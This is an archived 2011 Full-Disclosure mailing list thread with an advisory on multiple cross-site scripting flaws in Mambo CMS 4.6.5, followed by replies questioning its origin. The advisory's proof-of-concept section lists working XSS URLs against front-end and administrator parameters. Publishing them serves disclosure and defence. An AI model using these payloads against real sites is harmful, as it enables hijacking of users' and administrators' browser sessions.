Re: [Full-disclosure] Mambo CMS 4.6.x (4.6.5) | Multiple Cross Site Scripting Vulnerabilities

2011-06-28 Thread Zach C.
On Mon, Jun 27, 2011 at 8:04 PM, YGN Ethical Hacker Group li...@yehg.net wrote:


 The XSS results are from a purely blackbox scan on Mambo 4.6.5.


Wait, so you're telling me that you're running some program to find these
and then just reporting the results to this list? If so, please give some
credit to the program's author for actually finding these!

Or, if you mean you're just blindly throwing XSS attacks at random variables
hoping to find one that sticks... well, why hasn't a script been written for
this yet? (Or if one has, what's it called?)
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] Mambo CMS 4.6.x (4.6.5) | Multiple Cross Site Scripting Vulnerabilities

2011-06-27 Thread YGN Ethical Hacker Group
Mambo CMS 4.6.x (4.6.5) | Multiple Cross Site Scripting Vulnerabilities



1. OVERVIEW

Mambo CMS 4.6.5 and lower versions are vulnerable to Cross Site Scripting.


2. BACKGROUND

Mambo is a full-featured, award-winning content management system that
can be used for everything from simple websites to complex corporate
applications. It is used all over the world to power government
portals, corporate intranets and extranets, ecommerce sites, nonprofit
outreach, schools, church, and community sites. Mambo's power in
simplicity also makes it the CMS of choice for many small businesses
and personal sites.


3. VULNERABILITY DESCRIPTION

Multiple parameters (task, menu, menutype, zorder, search, client,
section) are not properly sanitized, which allows an attacker to conduct
a Cross Site Scripting attack. This may allow an attacker to create a
specially crafted URL that would execute arbitrary script code in a
victim's browser.


4. VERSIONS AFFECTED

Tested on Mambo CMS 4.6.5 (current as of 2011-06-27)


5. PROOF-OF-CONCEPT/EXPLOIT

FrontEnd
==

param: task

http://attacker.in/mambo/index.php?option=com_content&task=%22%20style=width:1000px;height:1000px;top:0;left:0;position:absolute%20onmouseover=alert%28/XSS/%29%20id=3&Itemid=32


BackEnd
==

param: menu

http://attacker.in/mambo/administrator/index2.php?option=com_menumanager&task=edit&hidemainmenu=1&menu=Move+your+mouse+here%22%20style=position:absolute;width:1000px;height:1000px;top:0;left:0;%20onmouseover=alert%28/XSS/%29%20


param: menutype [hidden form xss, esp in IE 6,7 and older versions of Firefox]

http://attacker.in/mambo/administrator/index2.php?option=com_menus&menutype=xss%20style%3dx%3aexpression(alert(/XSS/))%20X
http://attacker.in/mambo/administrator/index2.php?option=com_menus&menutype=xss%20%20%20style=background-image:url('javascript:alert(/XSS/)');width:1000px;height:1000px;display:block;%20x=%20X


param: zorder

http://attacker.in/mambo/administrator/index2.php?limit=10&order%5b%5d=11&boxchecked=0&toggle=on&search=simple_search&task=&limitstart=0&cid%5b%5d=on&zorder=c.ordering+DESC;<script>alert(/XSS/)</script>&filter_authorid=62&hidemainmenu=0&option=com_typedcontent


param: search

http://attacker.in/mambo/administrator/index2.php?limit=10&boxchecked=0&toggle=on&search=xss;<script>alert(/XSS/)</script>&task=&limitstart=0&hidemainmenu=0&option=com_comment


param: client

http://attacker.in/mambo/administrator/index2.php?option=com_modules&client=%27%22%20onmouseover=alert%28/XSS/%29%20a=%22%27
NB: mouseover on banner link


param: section  [hidden form xss, esp in IE 6,7 and older versions of Firefox]

http://attacker.in/mambo/administrator/index2.php?option=com_categories&section=com_weblinks%20style%3dx%3aexpression(alert(/XSS/))%20X&task=editA&hidemainmenu=1&id=2

http://attacker.in/mambo/administrator/index2.php?option=com_categories&section=com_weblinks%20style%3d-moz-binding:url(http://www.businessinfo.co.uk/labs/xbl/xbl.xml%23xss)%20X&task=editA&hidemainmenu=1&id=2

http://attacker.in/mambo/administrator/index2.php?option=com_categories&section=com_weblinks%20%20style=background-image:url('javascript:alert(0)');width:1000px;height:1000px;display:block;%20x=%20X&task=editA&hidemainmenu=1&id=2

http://attacker.in/mambo/administrator/index2.php?option=com_categories&section=com_weblinks%20%20style=background-image:url(javascript:alert(0));width:1000px;height:1000px;display:block;%20x=%20X&task=editA&hidemainmenu=1&id=2


6. SOLUTION

The vendor seems to have discontinued development. It is recommended to
use another CMS in active development.


7. VENDOR

Mambo CMS Development Team
http://mambo-developer.org


8. CREDIT

This vulnerability was discovered by Aung Khant, http://yehg.net, YGN
Ethical Hacker Group, Myanmar.


9. DISCLOSURE TIME-LINE

2010-11-31: notified vendor through bug tracker
2011-06-27: no patched version released up to date
2011-06-27: vulnerability disclosed


10. REFERENCES

Original Advisory URL:
http://yehg.net/lab/pr0js/advisories/[mambo4.6.x]_cross_site_scripting
Mambo CMS: http://mambo-code.org/gf/download/frsrelease/388/791/MamboV4.6.5.zip


#yehg [2011-06-27]



Re: [Full-disclosure] Mambo CMS 4.6.x (4.6.5) | Multiple Cross Site Scripting Vulnerabilities

2011-06-27 Thread Jacqui Caren-home
On 27/06/2011 09:15, YGN Ethical Hacker Group wrote:
 Mambo CMS 4.6.x (4.6.5) | Multiple Cross Site Scripting Vulnerabilities


I thought these were found in Joomla ages ago?

Did you really test a code base that is a version of an old Joomla base
or did you look at the code, and test old Joomla bugs against it?



Re: [Full-disclosure] Mambo CMS 4.6.x (4.6.5) | Multiple Cross Site Scripting Vulnerabilities

2011-06-27 Thread YGN Ethical Hacker Group
 Did you really test a code base that is a version of an old Joomla base
No

 or did you look at the code, and test old Joomla bugs against it?
No


The XSS results are from a purely blackbox scan on Mambo 4.6.5.


Joomla (Joomla! 1.0.0) was released on September 16, 2005. It was a
re-branded release of Mambo 4.5.2.3 which, itself, was combined with
other bug and moderate-level security fixes.

From that statement, it can be assumed that the code bases of Mambo
4.5.2.4 and higher are different from those of Joomla! 1.1 and
higher. As you suggest, we could try old Joomla! 1.x bugs against Mambo
4.6.x, but it would be time-consuming to analyze the code changes and
the validity of the bugs in each version of both CMSes.


https://secure.wikimedia.org/wikipedia/en/wiki/Joomla
http://www.joomla.org/announcements/general-news/154-introducing-joomla-10.html



 I thought these were found in Joomla ages ago?

No.


